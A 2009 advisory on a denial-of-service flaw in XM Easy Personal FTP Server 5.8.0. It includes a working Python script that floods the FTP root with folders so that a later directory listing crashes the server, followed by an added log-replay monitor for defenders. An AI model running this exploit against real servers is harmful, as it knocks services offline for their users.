
xmepftp580-dos.txt

Posted on 24 November 2009

###################
Date of Discovery: 24-Nov-2009
Credits: leinakesi[at]gmail.com
Vendor: Dxmsoft
*******************************************************************************
Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected
*******************************************************************************
Overview:
XM Easy Personal FTP Server fails to handle more than 2000 files or folders in the root directory.
*******************************************************************************
Details:
If you can log on to the server, take the following steps and the server will crash, which leads to a DoS.
1. Upload 2000 files or folders.
2. Close the current connection.
3. Use an FTP client to reconnect to the server.
   user ...
   pass ...
   port ...
   list ...
   crash!!!!!!
*******************************************************************************
Exploit example:
1. Upload 2000 folders.

#!/usr/bin/python
# Logs in and issues MKD for names "a".."a"*199, "b".."b"*199, ... "j".."j"*199
# (199 folders per letter) in the login directory.
import socket
import sys

def Usage():
    print("Usage: ./expl.py <serv_ip> <Username> <password>")
    print("Example: ./expl.py 192.168.48.183 anonymous anonymous")

if len(sys.argv) != 4:
    Usage()
    sys.exit(1)

hostname = sys.argv[1]
username = sys.argv[2]
passwd = sys.argv[3]

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.connect((hostname, 21))
except socket.error:
    print("Connection error!")
    sys.exit(1)

def command(line):
    # FTP commands are terminated by CRLF; return the server's reply as text
    sock.send((line + "\r\n").encode())
    return sock.recv(1024).decode(errors="replace")

r = sock.recv(1024)              # server banner
command("user %s" % username)
command("pass %s" % passwd)     # read the login reply before sending MKD

for letter in "abcdefghij":
    for i in range(1, 200):
        print("[-] mkd " + letter * i)
        print("[+] " + command("mkd " + letter * i))

sock.close()
sys.exit(0)

2. Use an FTP client to reconnect to the server, for example:
   start->run->cmd->ftp 127.0.0.1->*****->*****->dir

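Added example (not part of the original advisory or the vendor's code): a defender-side replay of FTP command logs that tracks how many entries sit directly in the FTP root and raises an alert before the 2000-entry count named in the Overview is reached. The "session user CMD argument reply" log layout, the `existing` starting count and the 80% warning level are assumptions, and the sample lines are constructed.

```python
import posixpath
from collections import Counter

ROOT_LIMIT = 2000                    # root entry count named in the advisory
ADD = {"MKD": "257", "STOR": "226"}  # command -> RFC 959 success reply
DEL = {"RMD": "250", "DELE": "250"}

def sample_log():
    """Constructed sample; the 'session user CMD argument reply' layout is an
    assumption for this example, not the product's real log format."""
    lines = ["s1 alice CWD /docs 250", "s1 alice MKD reports 257"]
    lines += ["s2 anonymous MKD %s 257" % ("a" * i) for i in range(1, 200)]
    lines += ["s2 anonymous MKD /b%d 257" % i for i in range(1, 200)]
    lines += ["s2 anonymous RMD a 250", "s2 anonymous MKD denied 550"]
    return lines

def root_growth(lines, existing=0, warn_pct=80):
    """Replay commands; return (root_total, adds_per_user, alerts).
    `existing` is the number of entries already in the root (assumed input)."""
    cwd, root, per_user, alerts = {}, set(), Counter(), []
    threshold = ROOT_LIMIT * warn_pct // 100
    for line in lines:
        if len(line.split()) < 5:
            continue                          # commands without an argument
        session, user, cmd, rest = line.split(None, 3)
        arg, code = rest.rsplit(None, 1)      # argument may contain spaces
        cmd = cmd.upper()
        path = posixpath.normpath(posixpath.join(cwd.get(session, "/"), arg))
        if cmd == "CWD":
            if code == "250":
                cwd[session] = path           # track each session's directory
        elif posixpath.dirname(path) != "/" or path == "/":
            continue                          # not a direct child of the root
        elif ADD.get(cmd) == code and path not in root:
            root.add(path)
            per_user[user] += 1
            if existing + len(root) == threshold:
                alerts.append((user, session, existing + len(root)))
        elif DEL.get(cmd) == code:
            root.discard(path)
    return existing + len(root), per_user, alerts

if __name__ == "__main__":
    total, per_user, alerts = root_growth(sample_log(), existing=1500)
    print(total, dict(per_user), alerts)
```

The per-user counter shows which account is responsible for the growth, so a quota or account lockout can be applied before a later LIST on the root hits the crash condition.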
 
